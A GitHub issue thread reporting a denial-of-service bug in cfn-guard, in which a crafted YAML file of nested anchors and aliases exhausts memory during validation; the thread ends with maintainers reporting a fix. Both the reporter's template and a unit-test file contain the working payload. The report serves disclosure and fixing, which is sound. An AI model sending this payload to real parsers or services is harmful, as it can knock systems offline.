cloudformation-guard icon indicating copy to clipboard operation
cloudformation-guard copied to clipboard
verified publisher icon aws-cloudformation

[BUG] DoS using Crafted Yaml file

Open sepehrdaddev opened this issue 4 years ago • 3 comments

Describe the bug cfn-guard uses uncontrolled amount of memory (ram) while processing carefully crafted cloudformation template in yaml format, resulting in denial of service.

To Reproduce

  • Rule used rule.guard:
let excluded_resources = [
    /AWS::AmazonBroker/,
    /AWS::App*/
]
let resources = Resources.*[
    Type not in %excluded_resources
]
rule assert_all_resources_have_non_empty_tags when %resources !empty {
    %resources.Properties.Tags !empty
}
  • Template used crash.yaml:
test1: &test1 "test" 
test2: &test2 [*test1,*test1,*test1,*test1,*test1,*test1,*test1,*test1,*test1] 
test3: &test3 [*test2,*test2,*test2,*test2,*test2,*test2,*test2,*test2,*test2]
test4: &test4 [*test3,*test3,*test3,*test3,*test3,*test3,*test3,*test3,*test3]
test5: &test5 [*test4,*test4,*test4,*test4,*test4,*test4,*test4,*test4,*test4]
test6: &test6 [*test5,*test5,*test5,*test5,*test5,*test5,*test5,*test5,*test5]
test7: &test7 [*test6,*test6,*test6,*test6,*test6,*test6,*test6,*test6,*test6]
test8: &test8 [*test7,*test7,*test7,*test7,*test7,*test7,*test7,*test7,*test7]
test9: &test9 [*test8,*test8,*test8,*test8,*test8,*test8,*test8,*test8,*test8]
test10: &test10 [*test9,*test9,*test9,*test9,*test9,*test9,*test9,*test9,*test9]

  • Command used cfn-guard validate -d crash.yaml -r rule.guard

  • Output: cfn-guard fills the Operating System's Memory until OOM kills the process, no output is generated by cfn-guard.

Expected behavior It is expected to get parsing error.

Operating System: Ubuntu 20.04, Amazon Linux 2

sepehrdaddev avatar Nov 23 '21 09:11 sepehrdaddev

Thank you for reporting this bug. Is the snippet provided above sufficient to re-produce the problem?

dchakrav-github avatar Nov 29 '21 20:11 dchakrav-github

Hi @dchakrav-github, yes, this is the complete code that I used to find this bug.

sepehrdaddev avatar Nov 29 '21 21:11 sepehrdaddev

Hi, I found that it also affects unit tests, the following are examples of such cases:

  • Rules rule.guard:
let excluded_resources = [
    /AWS::AmazonBroker/,
    /AWS::App*/
]
let resources = Resources.*[
    Type not in %excluded_resources
]
rule assert_all_resources_have_non_empty_tags when %resources !empty {
    %resources.Properties.Tags !empty
}
  • Unit test file rule-tests.yaml:
- name: Allowed from CORRECT, expected PASS 
  input:
    test1: &test1 "test" 
    test2: &test2 [*test1,*test1,*test1,*test1,*test1,*test1,*test1,*test1,*test1]
    test3: &test3 [*test2,*test2,*test2,*test2,*test2,*test2,*test2,*test2,*test2]
    test4: &test4 [*test3,*test3,*test3,*test3,*test3,*test3,*test3,*test3,*test3]
    test5: &test5 [*test4,*test4,*test4,*test4,*test4,*test4,*test4,*test4,*test4]
    test6: &test6 [*test5,*test5,*test5,*test5,*test5,*test5,*test5,*test5,*test5]
    test7: &test7 [*test6,*test6,*test6,*test6,*test6,*test6,*test6,*test6,*test6]
    test8: &test8 [*test7,*test7,*test7,*test7,*test7,*test7,*test7,*test7,*test7]
    test9: &test9 [*test8,*test8,*test8,*test8,*test8,*test8,*test8,*test8,*test8]
    test10: &test10 [*test9,*test9,*test9,*test9,*test9,*test9,*test9,*test9,*test9]
  expectations:
    rules:
      assert_all_resources_have_non_empty_tags: PASS
  • Command used cfn-guard test -t rule-tests.yaml -r rule.guard

sepehrdaddev avatar Dec 29 '21 22:12 sepehrdaddev

Hi @sepehrdaddev we have merged a fix for this issue (#276) . Feel free to test it out again, and re-open if you find anything more.

Thanks,

joshfried-aws avatar Sep 21 '22 20:09 joshfried-aws